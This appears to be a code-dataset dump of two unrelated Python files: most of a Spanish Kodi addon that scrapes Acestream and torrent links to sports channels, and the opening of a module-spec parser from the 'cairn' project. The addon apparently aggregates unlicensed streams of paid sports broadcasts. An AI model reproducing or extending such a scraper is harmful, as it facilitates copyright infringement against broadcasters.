folder=True, isPlayable=False)\n\n if \"NBA Tv\" in dataWeb:\n plugintools.add_item(action=\"nbaTV\",url=web,title='[COLOR white]'+Lista4_Titulo+'[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n \n acotacion = \"a visionar<\"\n zapp = plugintools.find_single_match(dataWeb,acotacion+'(.*?) 0:\n plugintools.add_item(action=\"zapping\",url=\"\",title='[COLOR white]Zapping Arena[/COLOR]', thumbnail=logoprin, fanart=fondo, folder=True, isPlayable=False)\n \n plugintools.add_item(action=\"\", url=\"\", title=\"\", genre=\"\", thumbnail=logo_transparente, fanart=fondo, folder=False, isPlayable=False)\n mensaje = \"[COLOR firebrick]*Este addon se suministra gratuitamente desde [COLOR yellow][B]Kelebek[/B][COLOR firebrick]. 
Si está en algún otro paquete, es sin la AUTORIZACIÓN de sus creadores.[/COLOR]\"\n plugintools.add_item(action=\"\", url=\"\", title=mensaje, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n \n if not usaHorus:\n mensaje = \"[COLOR aqua]**Recuerde abrir previamente [COLOR red]Acestream [COLOR aqua]si no tiene activado [COLOR yellow]Horus [COLOR aqua]en los Ajustes del Addon.[/COLOR]\"\n plugintools.add_item(action=\"\", url=\"\", title=mensaje, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\n\n\ndef guiaEventos(params):\n\n acotacion = 'class=\"title\">'\n elTitulo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n \n dia = plugintools.find_single_match(evento[0],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n hora = plugintools.find_single_match(evento[1],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n deporte = plugintools.find_single_match(evento[2],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n competicion = plugintools.find_single_match(evento[3],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n partido = plugintools.find_single_match(evento[4],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n evento[5] = evento[5].replace(\"
\" , \" y \")\n canales = plugintools.find_single_match(evento[5],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n \n titu = \"\"\n titu = \"[COLOR white]-\" + dia + \" [COLOR lime](\" + hora + \") [COLOR orange] \" + deporte.title()\n titu = titu + \": \" + competicion.title() + \"-> [COLOR blue] \" + partido + \": [COLOR red]\" + canales + \"[/COLOR]\"\n \n plugintools.add_item(action=\"laLiaste\", url=\"\", title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n \n '''\n aCanal = [\"\",\"\"]\n if \"
\" in evento[5]: ## Hay mas de 1 canal para el evento\n #class=\"auto-style3\">9-10 [SPA]
17-18 [SPA]\n can2 = evento[5].replace(\"td>\" , \"\").replace(\"\\n\" , \"\") + \"<\"\n aCanal[0] = plugintools.find_single_match(can2,'>(.*?)(.*?)<')\n else:\n aCanal[0] = plugintools.find_single_match(evento[5],'>(.*?)<').replace(\"td>\" , \"\").replace(\"\\n\" , \"\")\n \n for canales in aCanal:\n if len(canales) > 0:\n ##Vamos a localizar el link del partido\n can2 = \">\" + canales.replace(\"[\" , \"<\")\n elCanal = plugintools.find_single_match(can2,'>(.*?)<').strip()\n #plugintools.log(\"*****************Canales: \"+canales+\"********************\")\n \n #Lo busco en el grupo \"a visionar\"\n acotacion = \"a visionar<\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n link = \"\"\n for item in lineas:\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<').strip()\n if titulo == elCanal:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n \n titu = \"\"\n if len(link) > 0: ## Tenemos Link, podemos poner el evento en Pantalla\n titu = \"[COLOR white]-\" + dia + \" [COLOR lime](\" + hora + \") [COLOR orange] \" + deporte.title()\n titu = titu + \": \" + competicion.title() + \"-> [COLOR blue] \" + partido + \" [COLOR red]\" + canales + \"[/COLOR]\"\n \n if \"acestream\" in link:\n horus = horusAce\n link = link.replace(\"acestream://\" , \"\")\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , partido)\n #plugintools.log(\"*****************Remplaza: \"+reemplaza+\"********************\")\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n '''\n\n\n\n\n\ndef listaCentral(params):\n \n acotacion = ListaCentralAcotaInicio\n acotaFin = ListaCentralAcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titulo+\"********************\")\n #plugintools.log(\"*****************Link: \"+link+\"********************\")\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = 
\"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\ndef bylucas(params): ##Lista 1\n \n acotacion = Lista1_AcotaInicio\n acotaFin = Lista1_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\ndef canalesHD(params): ##Lista 3\n \n acotacion = Lista3_AcotaInicio\n acotaFin = Lista3_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titulo+\"********************\")\n #plugintools.log(\"*****************Link: \"+link+\"********************\")\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef manukos(params): ##Lista 2\n \n acotacion = Lista2_AcotaInicio\n acotaFin = Lista2_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = 
plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef nbaTV(params): ##Lista 4\n \n acotacion = Lista4_AcotaInicio\n acotaFin = Lista4_AcotaFin\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)'+acotaFin) \n canales = plugintools.find_multiple_matches(grupo,'')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n '''\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n \n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n '''\n mivideo = link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef canales365(params):\n \n acotacion = \"Canales 365\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n titu = \"[COLOR white]\" + titulo + \"[/COLOR]\"\n if len(titulo) > 0:\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , 
\"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\ndef zapping(params):\n \n acotacion = \"a visionar<\"\n grupo = plugintools.find_single_match(dataWeb,acotacion+'(.*?)')\n for item in canales:\n link = plugintools.find_single_match(item,'href=\"(.*?)\"')\n titulo = plugintools.find_single_match(item,'follow\">(.*?)<')\n if len(titulo) > 0:\n titu = \"[COLOR white]Canal \" + titulo + \"[/COLOR]\"\n #plugintools.log(\"*****************Titu: \"+titu+\"********************\")\n if \"acestream\" in link:\n link = link.replace(\"acestream://\" , \"\")\n horus = horusAce\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-ID-ACE\" , link)\n else:\n horus = horusTorrent\n reemplaza = base64.b64decode(horus.encode('utf-8')).decode('utf-8').replace(\"MI-TORRENT\" , link)\n \n if usaHorus:\n reemplaza = reemplaza.replace(\"MI-FANART\" , \"\")\n reemplaza = reemplaza.replace(\"MI-ICONO\" , logoprin)\n reemplaza = reemplaza.replace(\"MI-TITULO\" , titulo)\n \n mivideo = \"plugin://script.module.horus/?\" + base64.b64encode(reemplaza.encode('utf-8')).decode('utf-8')\n else:\n if \"://\" in link: ##Es una url o de un link acortado o de una url torrent\n mivideo = \"http://127.0.0.1:6878/ace/getstream?url=\" + link\n else: ## Es un ID clásico de Acestream\n mivideo = \"http://127.0.0.1:6878/ace/getstream?id=\" + link\n \n plugintools.add_item(action=\"lanza\", url=mivideo, title=titu, genre=\"\", thumbnail=logoprin, fanart=fondo, folder=False, isPlayable=False)\n\n\n\n\n\ndef lanza(params):\n mivideo = params.get(\"url\")\n logo = params.get(\"thumbnail\")\n titu = params.get(\"title\")\n titulo = params.get(\"extra\")\n\n xbmc.Player().play(mivideo)\n\n\n\n\n\ndef laLiaste(params):\n\t\n xbmc.Player().play(lasliao)\n l1 = \" [COLOR red]La AGENDA es sólo informativa, NO reproduce enlaces.[/COLOR]\"+\"\\n\"+\"\\n\"\n l2 = \"Localice el evento, tome nota del canal en que se va a ver...\"+\"\\n\"\n l3 = \"vuelva al Menú Principal y busque el canal en sus Carpetas.\"\n mensaje = l1+l2+l3\n xbmcgui.Dialog().ok( \"[COLOR lime]¡¡¡INCORRECTO!!![/COLOR]\" , mensaje )\n\n\n\n\ndef salida(params):\n\n\txbmc.executebuiltin('ActivateWindow(10000,return)')\n\t\n\n\n\n\t\n\n\n\t\n\n\n\t\t\nrun()\n\n\t\t\n\n\n\n\n\t\n\n","repo_name":"GargantuaMC/gamece","sub_path":"plugin.video.FutbolTream/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":27024,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43849592249","text":"\"\"\"cairn.sysdefs.ModuleSpec - Module specification string parser\"\"\"\n\n\n#\n# Syntax. Spaces are removed.\n#\n# string -- Letters, numbers and '_'. ';' seperates words. '\"\"' can combine\n# words. Nested '\"\"' are not allowed. Wrapping '/' around the\n# lefthand string turns it into a regular expression. 
Wrapping\n# '{}' around the right hand string turns it into code that is\n# inserted into a module template and placed into the list.\n#\n# string(arg1=val1, arg2=val2, ...) -- Give a module these parameters\n# string1=string2 -- Replace 'string1' with 'string2'\n# string1string2 -- Insert 'string2' after 'string1'\n# -string -- Remove 'string' from the default\n# ^string -- Prepend 'string' onto the default\n# $string -- Append 'string' onto the default\n# ..string -- Make this module look from the top level, not current\n#\n\n\nimport re\nimport string\nimport shlex\n\nimport cairn\nfrom cairn import Options\n\n\n# Node Type\nUNKNOWN = 0\nIDENTIFIER = 1\nUSER_MOD_PY = 2\nUSER_MOD_SHELL = 3\nMOD_PARAMS = 4\nREGEX = 5\n\n# Node Op Type\nUNARY = 1\nBINARY = 2\nNO_OP = 3\n\n# Operators\nBINARY_OPS = [\"=\", \"<\", \">\"];\nUNARY_OPS = [\"-\", \"^\", \"$\"];\n\nQUOTES = [\"\\\"\", \"'\", \"/\", \"?\"]\nASYM_QUOTES = [\"(\", \")\", \"{\", \"}\", \"[\", \"]\"]\nASYM_QUOTES_LHS = [\"(\", \"{\", \"[\"]\nASYM_QUOTES_RHS = [\")\", \"}\", \"]\"]\nQUOTES_GROUPED = {\")\":\"(\", \"}\":\"{\", \"]\":\"[\", \"\\\"\":\"\\\"\", \"'\":\"'\", \"/\":\"/\",\n\t\t\t\t \"?\":\"?\"}\n\n\nclass ModuleInfo(object):\n\tdef __init__(self, **args):\n\t\tself.type = None\n\t\tself.opType = None\n\t\tself.lhs = None\n\t\tself.rhs = None\n\t\tself.op = None\n\t\tself.regex = None\n\t\tself.name = None\n\t\tself.module = None\n\t\tself.args = {}\n\n\t\tif \"type\" in args:\n\t\t\tself.type = args[\"type\"]\n\t\tif \"opType\" in args:\n\t\t\tself.opType = args[\"opType\"]\n\t\tif \"lhs\" in args:\n\t\t\tself.lhs = args[\"lhs\"]\n\t\tif \"rhs\" in args:\n\t\t\tself.rhs = args[\"rhs\"]\n\t\tif \"op\" in args:\n\t\t\tself.op = args[\"op\"]\n\t\tif \"regex\" in args:\n\t\t\tself.regex = args[\"regex\"]\n\t\tif \"name\" in args:\n\t\t\tself.name = args[\"name\"]\n\t\tif \"module\" in args:\n\t\t\tself.module = args[\"module\"]\n\t\tif \"args\" in args:\n\t\t\tself.args = args[\"args\"]\n\t\treturn\n\n\n\tdef copy(self, rhs):\n\t\tself.type = rhs.type\n\t\tself.opType = rhs.opType\n\t\tself.lhs = rhs.lhs\n\t\tself.rhs = rhs.rhs\n\t\tself.op = rhs.op\n\t\tself.regex = rhs.regex\n\t\tself.name = rhs.name\n\t\tself.module = rhs.module\n\t\tself.args = rhs.args\n\t\treturn\n\n\n\tdef getValue(self):\n\t\tif self.lhs and ((self.opType == UNARY) or (self.opType == NO_OP)):\n\t\t\treturn self.lhs\n\t\telif self.rhs and (self.opType == BINARY):\n\t\t\treturn self.rhs\n\n\n\tdef getNames(self):\n\t\tval = self.getValue()\n\t\treturn val.split(\";\")\n\n\n\tdef __str__(self):\n\t\tstr = \"ModuleSpec.ModuleInfo: type = %s opType = %s lhs = '%s' rhs = '%s' \"\n\t\tstr = str + \"op = '%s' regex = '%s'\"\n\t\tstr = str % (typeToStr(self.type), opTypeToStr(self.opType), self.lhs,\n\t\t\t\t\t self.rhs, self.op, self.regex)\n\t\treturn str\n\n\ndef parseModuleSpec(sysdef, moduleSpec, userModuleSpec, prefix):\n\tcairn.devel(\"Parsing module spec: spec='%s' prefix='%s'\" % (moduleSpec, prefix))\n\tmodules = splitModuleSpec(moduleSpec, prefix)\n\tcairn.devel(\"System module spec:\")\n\tfor mod in modules:\n\t\tcairn.devel(\" %s\" % mod)\n\tif userModuleSpec:\n\t\tuserModuleNames = splitModuleSpec(userModuleSpec, None)\n\t\tcairn.devel(\"User module spec:\")\n\t\tfor mod in userModuleNames:\n\t\t\tcairn.devel(\" %s\" % mod)\n\t\tapplySpec(modules, userModuleNames)\n\t\tcairn.devel(\"Combined spec:\")\n\t\tfor mod in modules:\n\t\t\tcairn.devel(\" %s\" % mod)\n\treturn modules\n\n\ndef splitModuleSpec(moduleSpec, prefix):\n\tstr = 
moduleSpec.replace(\" \", \"#\")\n\tstr = str.replace(\"\t\", \"#\")\n\tstr = str + \";\"\n\tlexer = shlex.shlex(str, None, True)\n\tlexer.wordchars = lexer.wordchars + \".\"\n\tlexer.commenters = \"\"\n\tlexer.whitespace = lexer.whitespace.replace(\"\\n\", \"\")\n\tlexer.quotes = \"\"\n\tparsing = True\n\tcurInfo = None\n\tnodes = []\n\twhile parsing:\n\t\t(token, ttype) = nextToken(lexer)\n\t\tif not token:\n\t\t\tbreak\n\t\tif (token == \";\"):\n\t\t\tif curInfo:\n\t\t\t\tif ((curInfo.type == IDENTIFIER) and not curInfo.op and\n\t\t\t\t\tcurInfo.lhs):\n\t\t\t\t\tcurInfo.opType = NO_OP\n\t\t\t\t\tnodes.append(curInfo)\n\t\t\t\t\tcurInfo = None\n\t\t\t\telse:\n\t\t\t\t\traise cairn.Exception(\"Parse error, unexpected ';'\")\n\t\telif (token == \"#\") or (token == \"\\n\"):\n\t\t\tcontinue\n\t\telif not curInfo:\n\t\t\tif (ttype == IDENTIFIER) and (token in UNARY_OPS):\n\t\t\t\top = token\n\t\t\t\t(token, ttype) = nextToken(lexer)\n\t\t\t\tif (ttype == UNKNOWN):\n\t\t\t\t\traise cairn.Exception(\"Parse error, invalid token '%s' after '%s'\" % (token, op))\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\tcurInfo = ModuleInfo(type=IDENTIFIER, opType=UNARY, op=op,\n\t\t\t\t\t\t\t\t lhs=token, regex=True)\n\t\t\t\telse:\n\t\t\t\t\tcurInfo = ModuleInfo(type=ttype, opType=UNARY, op=op, lhs=token)\n\t\t\t\tnodes.append(curInfo)\n\t\t\t\tcurInfo = None\n\t\t\telse:\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\tcurInfo = ModuleInfo(type=IDENTIFIER, lhs=token, regex=True)\n\t\t\t\telse:\n\t\t\t\t\tcurInfo = ModuleInfo(type=ttype, lhs=token)\n\t\telse:\n\t\t\tif not curInfo.op:\n\t\t\t\tif ttype != IDENTIFIER:\n\t\t\t\t\traise cairn.Exception(\"Parse error, expected binary operator\")\n\t\t\t\tif not token in BINARY_OPS:\n\t\t\t\t\traise cairn.Exception(\"Parse error, invalid binary operator: %s\" % token)\n\t\t\t\tcurInfo.op = token\n\t\t\t\tcurInfo.opType = BINARY\n\t\t\telif curInfo.opType == BINARY:\n\t\t\t\tif ttype == REGEX:\n\t\t\t\t\traise cairn.Exception(\"Parse err, found regex '%s' when expected identifier\" % token)\n\t\t\t\tcurInfo.rhs = token\n\t\t\t\tcurInfo.type = ttype\n\t\t\t\tnodes.append(curInfo)\n\t\t\t\tcurInfo = None\n\tif prefix:\n\t\tapplyPrefix(nodes, prefix)\n\treturn nodes\n\n\ndef nextToken(lexer):\n\ttoken = lexer.get_token()\n\tif token == \"/\":\n\t\tid = matchToken(lexer, \"/\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid regex in module name\")\n\t\treturn (id, REGEX)\n\telif token == \"(\":\n\t\tid = matchToken(lexer, \"(\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid '()' in module name\")\n\t\treturn (id, USER_MOD_PY)\n\telif token == \"{\":\n\t\tid = matchToken(lexer, \"{\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid user shell module '{}'\")\n\t\treturn (id, USER_MOD_SHELL)\n\telif token == \"[\":\n\t\tid = matchToken(lexer, \"[\")\n\t\tif not id:\n\t\t\traise cairn.Exception(\"Parse error, invalid user python module '[]'\")\n\t\treturn (id, USER_MOD_PY)\n\telse:\n\t\treturn (token, IDENTIFIER)\n\n\ndef matchToken(lexer, match):\n\ttoken = lexer.get_token()\n\tid = \"\"\n\tstack = [match]\n\tescaped = False\n\tif match in QUOTES:\n\t\texactMatch = match\n\telse:\n\t\texactMatch = None\n\twhile token and len(stack):\n\t\tif (token == \"\\\\\"):\n\t\t\tif escaped:\n\t\t\t\tescaped = False\n\t\t\telse:\n\t\t\t\tescaped = True\n\t\telif escaped:\n\t\t\tescaped = False\n\n\t\tif not escaped:\n\t\t\tif token == exactMatch:\n\t\t\t\tstack.pop()\n\t\t\t\texactMatch = None\n\t\t\telif (not exactMatch) and (token in 
QUOTES):\n\t\t\t\tstack.append(token)\n\t\t\t\texactMatch = token\n\t\t\telif (not exactMatch) and (token in ASYM_QUOTES_LHS):\n\t\t\t\tstack.append(token)\n\t\t\telif (not exactMatch) and (token in ASYM_QUOTES):\n\t\t\t\tpopped = False\n\t\t\t\tlhs = QUOTES_GROUPED[token]\n\t\t\t\tif lhs:\n\t\t\t\t\tsize = len(stack)\n\t\t\t\t\tindex = 0\n\t\t\t\t\twhile size + index >= 0:\n\t\t\t\t\t\tindex = index - 1\n\t\t\t\t\t\tif (stack[index + size] == lhs):\n\t\t\t\t\t\t\twhile index < 0:\n\t\t\t\t\t\t\t\tstack.pop()\n\t\t\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\t\tpopped = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\tif not popped:\n\t\t\t\t\t\tstack.append(token)\n\t\t\t\telse:\n\t\t\t\t\tstack.append(token)\n\t\tif len(stack):\n\t\t\tif token == \"#\":\n\t\t\t\tid = id + \" \"\n\t\t\telse:\n\t\t\t\tid = id + token\n\t\t\ttoken = lexer.get_token()\n\t\telse:\n\t\t\tbreak\n\tif not token:\n\t\treturn None\n\treturn id\n\n\ndef applyPrefix(nodes, prefix):\n\tfor node in nodes:\n\t\tif (node.type == USER_MOD_PY) or (node.type == USER_MOD_SHELL):\n\t\t\tcontinue\n\t\tif node.lhs and ((node.opType == UNARY) or (node.opType == NO_OP)):\n\t\t\tnode.lhs = splitApplyPrefix(node.lhs, prefix)\n\t\telif node.rhs and (node.opType == BINARY):\n\t\t\tnode.rhs = splitApplyPrefix(node.rhs, prefix)\n\treturn\n\n\ndef splitApplyPrefix(inStr, prefix):\n\tstrs = inStr.split(\";\")\n\toutStr = \"\"\n\tfor str in strs:\n\t\tstr = str.strip()\n\t\tif str.startswith(\"..\"):\n\t\t\toutStr = \"%s;%s\" % (outStr, str.lstrip(\"..\"))\n\t\telse:\n\t\t\toutStr = \"%s;%s.%s\" % (outStr, prefix, str)\n\treturn outStr.lstrip(\";\")\n\n\ndef applySpec(moduleNames, userModuleNames):\n\tfor userModule in userModuleNames:\n\t\tif (userModule.op == \"=\"):\n\t\t\tapplyReplace(moduleNames, userModule)\n\t\telif (userModule.op == \"<\") or (userModule.op == \">\"):\n\t\t\tapplyInsert(moduleNames, userModule)\n\t\telif (userModule.op == \"-\"):\n\t\t\tapplyRemove(moduleNames, userModule)\n\t\telif (userModule.op == \"^\"):\n\t\t\tapplyPrepend(moduleNames, userModule)\n\t\telif (userModule.op == \"$\"):\n\t\t\tapplyAppend(moduleNames, userModule)\n\t\telif not userModule.op:\n\t\t\tcontinue\n\t\telse:\n\t\t\traise cairn.Exception(\"Unknown operator: %s\" % userModule.op)\n\n\ndef makeRE(module):\n\tif module.regex:\n\t\tname = module.lhs\n\telse:\n\t\tname = \"^%s$\" % module.lhs\n\tcairn.debug(\"makeRE: %s\" % name)\n\treturn re.compile(name)\n\n\ndef applyReplace(moduleNames, userModule):\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tmoduleNames[i] = userModule\n\t\t\tbreak\n\treturn\n\n\ndef applyInsert(moduleNames, userModule):\n\tif (userModule.op == \"<\"):\n\t\tbefore = True\n\telse:\n\t\tbefore = False\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tif before:\n\t\t\t\tmoduleNames.insert(i, userModule)\n\t\t\telse:\n\t\t\t\tmoduleNames.insert(i+1, userModule)\n\t\t\tbreak\n\treturn\n\n\ndef applyRemove(moduleNames, userModule):\n\tre = makeRE(userModule)\n\tfor i, v in enumerate(moduleNames):\n\t\tif re.search(v.getValue()):\n\t\t\tmoduleNames.remove(v)\n\t\t\tbreak\n\treturn\n\n\ndef applyPrepend(moduleNames, userModule):\n\tmoduleNames.insert(0, userModule)\n\treturn\n\n\ndef applyAppend(moduleNames, 